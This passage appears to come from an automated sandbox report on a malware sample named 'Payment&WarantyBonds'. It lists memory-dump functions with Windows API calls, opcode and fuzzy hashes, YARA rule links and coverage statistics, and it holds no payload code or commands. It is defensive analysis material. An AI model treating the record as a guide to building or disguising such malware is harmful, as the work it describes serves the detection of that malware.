                                                                                                                                                                                • OutputDebugStringW.KERNELBASE(00000000), ref: 066D7860
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1720532618.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_66d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugOutputString
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1166629820-0
                                                                                                                                                                                • Opcode ID: 28ee4e11fe2a401ec2f5722bf929e194d3b15dbefc46409e027e3e254db0b9d5
                                                                                                                                                                                • Instruction ID: 69c91e3915471913e5227aa0c0643a8a41a2cedaaf80f0fcc2bd1db1d8fa8479
                                                                                                                                                                                • Opcode Fuzzy Hash: 28ee4e11fe2a401ec2f5722bf929e194d3b15dbefc46409e027e3e254db0b9d5
                                                                                                                                                                                • Instruction Fuzzy Hash: 871112B1D0065A9FCB14CF9AD444B9EFFB4BB48324F10812AD859A7350C374A544CFA5
                                                                                                                                                                                Function 00C03568 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715790734.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_c00000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ResumeThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 947044025-0
                                                                                                                                                                                • Opcode ID: 9de73e84bb99a68900f7c95a31c57414835d213f08b0c034ea8ed018d61e1903
                                                                                                                                                                                • Instruction ID: f0134def89178bc45c77cb1fd80fbcbc29ea0437c31dc4686fcbdd1c69cf31f7
                                                                                                                                                                                • Opcode Fuzzy Hash: 9de73e84bb99a68900f7c95a31c57414835d213f08b0c034ea8ed018d61e1903
                                                                                                                                                                                • Instruction Fuzzy Hash: 9F113AB19002498FCB20DFAAC4457DEFBF4EF88324F208419D559A7250CB75A944CF94
                                                                                                                                                                                Function 00C01DA8 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 00C05DC5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715790734.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_c00000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessagePost
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 410705778-0
                                                                                                                                                                                • Opcode ID: 41f4ac03ee46aba91ea8a84fd61901b04c02165481d7ced6d0a4b12c72c9d411
                                                                                                                                                                                • Instruction ID: b247bf20c5788689a98b1f2c570d733b6360906ba4f2aa22f3989f1feb2343ea
                                                                                                                                                                                • Opcode Fuzzy Hash: 41f4ac03ee46aba91ea8a84fd61901b04c02165481d7ced6d0a4b12c72c9d411
                                                                                                                                                                                • Instruction Fuzzy Hash: B911F2B58007499FDB20DF9AC588BDFBBF8EB48324F20841AE558A7250C375A944CFA5
                                                                                                                                                                                Function 00C05D61 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 00C05DC5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715790734.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_c00000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessagePost
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 410705778-0
                                                                                                                                                                                • Opcode ID: 6fbc6eafe5e473634286c0ed85fc35eb25ac98b0b397affb3f204477ba70ac90
                                                                                                                                                                                • Instruction ID: 203f710547ecc945ac7f8c4c31cd221d5dc24daa39de9e8fa3cfe70761f6d137
                                                                                                                                                                                • Opcode Fuzzy Hash: 6fbc6eafe5e473634286c0ed85fc35eb25ac98b0b397affb3f204477ba70ac90
                                                                                                                                                                                • Instruction Fuzzy Hash: B511F2B5800349DFDB10CF9AC548BDEBFF4EB48324F24841AE559A7650C375A944CFA1
                                                                                                                                                                                Function 007AAF78 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 007AAFDE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715216816.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7a0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HandleModule
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                                                                • Opcode ID: 23a18677d77e9b0dd8be434ea666984dc09f5c9e91fe7473291ee5d633cb0608
                                                                                                                                                                                • Instruction ID: aafbb74f8d053bb086114340961e6800ff6059e876adf4840a1fc69ce3406512
                                                                                                                                                                                • Opcode Fuzzy Hash: 23a18677d77e9b0dd8be434ea666984dc09f5c9e91fe7473291ee5d633cb0608
                                                                                                                                                                                • Instruction Fuzzy Hash: 6811EDB6C002499FCB24CF9AC444ADEFBF4EF89324F10852AD869A7610C379A545CFA5
                                                                                                                                                                                Function 0074D3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715034540.000000000074D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0074D000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_74d000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 00f5a18d948d70aa4148fc38e2a0f3759107ee0f252c445b079ce97f5b651c70
                                                                                                                                                                                • Instruction ID: ba32c881fd0c526fec4134db783fbb44b3dc9ddc1726e34ea9515641fe7ba147
                                                                                                                                                                                • Opcode Fuzzy Hash: 00f5a18d948d70aa4148fc38e2a0f3759107ee0f252c445b079ce97f5b651c70
                                                                                                                                                                                • Instruction Fuzzy Hash: 692125B1500284DFDB25DF18D9C0B26BF65FB98324F20C169ED494B256C33EEC56CAA2
                                                                                                                                                                                Function 0075D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715081417.000000000075D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0075D000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_75d000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4d0570c4ee5601fbd9b9bd57289a4298924d30e5a2a096ac394133dd041f31a4
                                                                                                                                                                                • Instruction ID: a7dd1aea7bde0764989876d2a287fe63af39e85d159ca3711aeba148af159a52
                                                                                                                                                                                • Opcode Fuzzy Hash: 4d0570c4ee5601fbd9b9bd57289a4298924d30e5a2a096ac394133dd041f31a4
                                                                                                                                                                                • Instruction Fuzzy Hash: 5F210471504204EFDB25DF14D9C0B66BBA5FB88315F20C66DEC094B296C7BADC4ACA61
                                                                                                                                                                                Function 0075D01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715081417.000000000075D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0075D000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_75d000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 2250e97aebd1ce6b4ae5d5cdb3667bb2ac4bc1a2c6607af4438d05603287e2e1
                                                                                                                                                                                • Instruction ID: 47c5524a8730e6fac8201cbf9278ce72ac5c0eba0ad7e2846d95cbeec361785a
                                                                                                                                                                                • Opcode Fuzzy Hash: 2250e97aebd1ce6b4ae5d5cdb3667bb2ac4bc1a2c6607af4438d05603287e2e1
                                                                                                                                                                                • Instruction Fuzzy Hash: B421D071604244DFDB34DF14D9C4B66BBA5EB88315F20C569DC0E4B296C3BADC4BCA61
                                                                                                                                                                                Function 0075D005 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715081417.000000000075D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0075D000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_75d000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ddc3be01e6715c120c4237bda0d1a5b6a1f4a2ca21ffa8d0557755df2f39b816
                                                                                                                                                                                • Instruction ID: 112a9e16e6c5d4f1d89495bc765ea32d34b63003ce63e43694444bdc11bfec1c
                                                                                                                                                                                • Opcode Fuzzy Hash: ddc3be01e6715c120c4237bda0d1a5b6a1f4a2ca21ffa8d0557755df2f39b816
                                                                                                                                                                                • Instruction Fuzzy Hash: 0721B0715083809FCB12CF24D994B11BF71EB46314F28C5EAD8498F2A7C37A9C0ACB62
                                                                                                                                                                                Function 0074D3D3 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715034540.000000000074D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0074D000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_74d000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                                                • Instruction ID: 00d6c3865edc5544fb35ed6c9f8ce1c77e15a8cb2212724258979decbfedbc02
                                                                                                                                                                                • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                                                • Instruction Fuzzy Hash: 6E112276404280CFCB12CF14D9C4B16BF72FB94324F24C2A9DC490B256C33AE85ACBA2
                                                                                                                                                                                Function 0075D1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715081417.000000000075D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0075D000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_75d000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                                                • Instruction ID: 7f91540d598edeb8f18bf05a2b1da30b21d42452659b98b3f1c271a06d0cfdcf
                                                                                                                                                                                • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                                                • Instruction Fuzzy Hash: 1F11BB75504280DFDB22CF10C5C4B55BBA1FB84324F24C6AEDC494B296C37AD84ACB61

                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                Function 066D5720 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1720532618.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_66d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 1952187b8dacd07feb39c78f9f199bf977d367ac9bc929f7c08086dedb9da566
                                                                                                                                                                                • Instruction ID: 2d3580831c8787ed3eebac25b0215a949afc53fd20f838795265818d61bb6d0f
                                                                                                                                                                                • Opcode Fuzzy Hash: 1952187b8dacd07feb39c78f9f199bf977d367ac9bc929f7c08086dedb9da566
                                                                                                                                                                                • Instruction Fuzzy Hash: F8E11CB4E102198FDB14DF99C5809AEFBB2FF89304F249159E415AB359D730AD42CFA0
                                                                                                                                                                                Function 066D6490 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1720532618.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_66d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 70f137449ef08a70d0a5fccb01304f45d356e7611a74539baee2742d832c6a6c
                                                                                                                                                                                • Instruction ID: b6f3fd6f5eeb3eaa2cd07f0149bc6ab33e8a9f46f6e50de6a0f4c080c697bc02
                                                                                                                                                                                • Opcode Fuzzy Hash: 70f137449ef08a70d0a5fccb01304f45d356e7611a74539baee2742d832c6a6c
                                                                                                                                                                                • Instruction Fuzzy Hash: 6FE11AB4E101198FDB14DFA9C5809AEFBF2FF89304F248169E415AB35AD730A941CFA1
                                                                                                                                                                                Function 066D52E8 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1720532618.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_66d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ce0a059e1b09b9b6675b3baededd9ba93f5ed465788c0b2d0ceb06edca942be3
                                                                                                                                                                                • Instruction ID: 9f90c2bd65514268bd6ce8ee8f5f2bf0710396baad1a40f95576f8bc079d931f
                                                                                                                                                                                • Opcode Fuzzy Hash: ce0a059e1b09b9b6675b3baededd9ba93f5ed465788c0b2d0ceb06edca942be3
                                                                                                                                                                                • Instruction Fuzzy Hash: 23E11AB4E101198FDB14DFA9C5809AEFBB2FF88304F248169E415AB35AD731AD41CFA1
                                                                                                                                                                                Function 066D5BE0 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1720532618.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_66d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5de70d2f4f265794c1fdb5b9d5a420d18429d01945cda3bda7fbb72d675de021
                                                                                                                                                                                • Instruction ID: 4d60fa78c072473d771d4f30be2b9c430772a473cf34471e6cf00ff5cda36a90
                                                                                                                                                                                • Opcode Fuzzy Hash: 5de70d2f4f265794c1fdb5b9d5a420d18429d01945cda3bda7fbb72d675de021
                                                                                                                                                                                • Instruction Fuzzy Hash: 69E11A74E102198FDB14DFA9C5849AEFBB2FF89304F249169E415AB35AD730AD41CFA0
                                                                                                                                                                                Function 00C010A8 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715790734.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_c00000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 94cd6d466d86a5a9b48893bcdb9c32e68ded80f63a1639ad556453f1c03068a7
                                                                                                                                                                                • Instruction ID: b93ed5ebad259cbf095b09b2ee05807c73a61b76726606511f1bae1b90636ed9
                                                                                                                                                                                • Opcode Fuzzy Hash: 94cd6d466d86a5a9b48893bcdb9c32e68ded80f63a1639ad556453f1c03068a7
                                                                                                                                                                                • Instruction Fuzzy Hash: 1AE1D9B4E001199FCB14DFA9C5809AEFBF2FF49304F249169E914AB359D731A942CF61
                                                                                                                                                                                Function 00C02908 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715790734.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_c00000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 53bbc229f5034b2570cabfff0143a70c9010e755ca9708a3565e0370b54d72f6
                                                                                                                                                                                • Instruction ID: eaa729a990a10f6bf40066245bf0012b2bed513b97dae1460991b3ae9ed8e31b
                                                                                                                                                                                • Opcode Fuzzy Hash: 53bbc229f5034b2570cabfff0143a70c9010e755ca9708a3565e0370b54d72f6
                                                                                                                                                                                • Instruction Fuzzy Hash: 7CE1F774E002198FDB14DFA9C5849AEBBF2FF89304F249169D515AB35ADB30AD42CF60
                                                                                                                                                                                Function 00C00C70 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715790734.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_c00000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: f12cad7df0cca4e0ff1f114aec53e935693a6bdf361fc7683a813f574ed9e778
                                                                                                                                                                                • Instruction ID: 6d30e96aa5337583e19c3b43eeda55c556c464a38800d3a5bf1813dc45afe3b4
                                                                                                                                                                                • Opcode Fuzzy Hash: f12cad7df0cca4e0ff1f114aec53e935693a6bdf361fc7683a813f574ed9e778
                                                                                                                                                                                • Instruction Fuzzy Hash: 13E1E974E002198FCB14DFA9C580AAEFBF2FF49304F249169E554AB35AD731A942CF60
                                                                                                                                                                                Function 00C02D40 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715790734.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_c00000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b0747de51385e47c85d96af44500c6725f36d9952dc884778ed1c7504b017e03
                                                                                                                                                                                • Instruction ID: 29c07990ad045206e9d23596177e1c88aaf6b87eb67c09559707037706b23fa3
                                                                                                                                                                                • Opcode Fuzzy Hash: b0747de51385e47c85d96af44500c6725f36d9952dc884778ed1c7504b017e03
                                                                                                                                                                                • Instruction Fuzzy Hash: 42E1E674E001598FCB14DFA9C5849AEFBF2FF89304F249169E515AB35AD730AA42CF60
                                                                                                                                                                                Function 00C007F8 Relevance: .3, Instructions: 295COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715790734.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_c00000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0320dfe1c4fdd7cd4cd4baf8c5fa173554add729a37bec3f976b574f1e8de0c6
                                                                                                                                                                                • Instruction ID: a1a849f2d1f8d57823af95de02c91690d68819ce0b2c9812259e06a040016c2f
                                                                                                                                                                                • Opcode Fuzzy Hash: 0320dfe1c4fdd7cd4cd4baf8c5fa173554add729a37bec3f976b574f1e8de0c6
                                                                                                                                                                                • Instruction Fuzzy Hash: 23D1E774E002198FDB14DFA9C580AAEFBF2FF49305F249169E415AB35AD730A942CF61
                                                                                                                                                                                Function 066D8B31 Relevance: .3, Instructions: 270COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1720532618.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_66d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c85d68ba065be99f4fa5e46899100f8de507725ac705e5d773e9a7693cbf8c27
                                                                                                                                                                                • Instruction ID: 87db1f5e3bcdfbf84b9a7880a788d60f4855531eee8fa3d9c99be6bc2f289eb5
                                                                                                                                                                                • Opcode Fuzzy Hash: c85d68ba065be99f4fa5e46899100f8de507725ac705e5d773e9a7693cbf8c27
                                                                                                                                                                                • Instruction Fuzzy Hash: 4AD10831D2075ACADB10EB64D994A9DB7B1FF95300F10979AE00937225EBB0AAC9CF51
                                                                                                                                                                                Function 066D8B40 Relevance: .3, Instructions: 264COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1720532618.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_66d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c457b9a658fcf3436657fe8c0a6713d4fd9df99a239bec9da7be6a3bc39c20f9
                                                                                                                                                                                • Instruction ID: 68b1639d4e0d2447aa743737d0f945e510b157dc1629b67b9cd388a9eb80182f
                                                                                                                                                                                • Opcode Fuzzy Hash: c457b9a658fcf3436657fe8c0a6713d4fd9df99a239bec9da7be6a3bc39c20f9
                                                                                                                                                                                • Instruction Fuzzy Hash: 03D10731D2075ACADB10EB64D994A9DB3B1FF95300F10D79AE00937225EB70AAC9CF91
                                                                                                                                                                                Function 007AEF04 Relevance: .3, Instructions: 264COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715216816.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7a0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a09b07b4e794656d5f313393efa459e4f5a5a3472279269741b10d3a56392ede
                                                                                                                                                                                • Instruction ID: 6c98876c5bd371b3dfe64daaf1fe0f5b577d3a6da75b63104a8a0e9f839dc56a
                                                                                                                                                                                • Opcode Fuzzy Hash: a09b07b4e794656d5f313393efa459e4f5a5a3472279269741b10d3a56392ede
                                                                                                                                                                                • Instruction Fuzzy Hash: FFA13A32E00219CFCF05DFA5C98459EB7B2FFC5300B15866AE805AB265DB75ED56CB80
                                                                                                                                                                                Function 066DA0E8 Relevance: .2, Instructions: 169COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1720532618.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_66d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e6095b30a8ea3ab200a8b2acc36ef091a20fb802ebe59310b0cf7fad4e9af121
                                                                                                                                                                                • Instruction ID: 2eecc214385e2a3b49ec581604be6ceb1fd47de0489d3dadf7956666860043c1
                                                                                                                                                                                • Opcode Fuzzy Hash: e6095b30a8ea3ab200a8b2acc36ef091a20fb802ebe59310b0cf7fad4e9af121
                                                                                                                                                                                • Instruction Fuzzy Hash: 81717075E052188FDB44DFAAD98499EFBF2BF88300F18D16AE418AB315D734A942CF54
                                                                                                                                                                                Function 066DA0DA Relevance: .1, Instructions: 127COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1720532618.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_66d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: caa116dd8c1289660f918d2e388286d51892c99181ce2dfc7b78e8fe77e07709
                                                                                                                                                                                • Instruction ID: e51bdbd8fca610b05e150dd95babf794491c27bfeeb01467f4f3465f0bfb0ca0
                                                                                                                                                                                • Opcode Fuzzy Hash: caa116dd8c1289660f918d2e388286d51892c99181ce2dfc7b78e8fe77e07709
                                                                                                                                                                                • Instruction Fuzzy Hash: F2515E75E04618CFDB48DFAAD98469EFBF2BF88300F14C16AD419AB354DB349946CB50

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:1.1%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:5.6%
                                                                                                                                                                                Signature Coverage:3.2%
                                                                                                                                                                                Total number of Nodes:126
                                                                                                                                                                                Total number of Limit Nodes:8
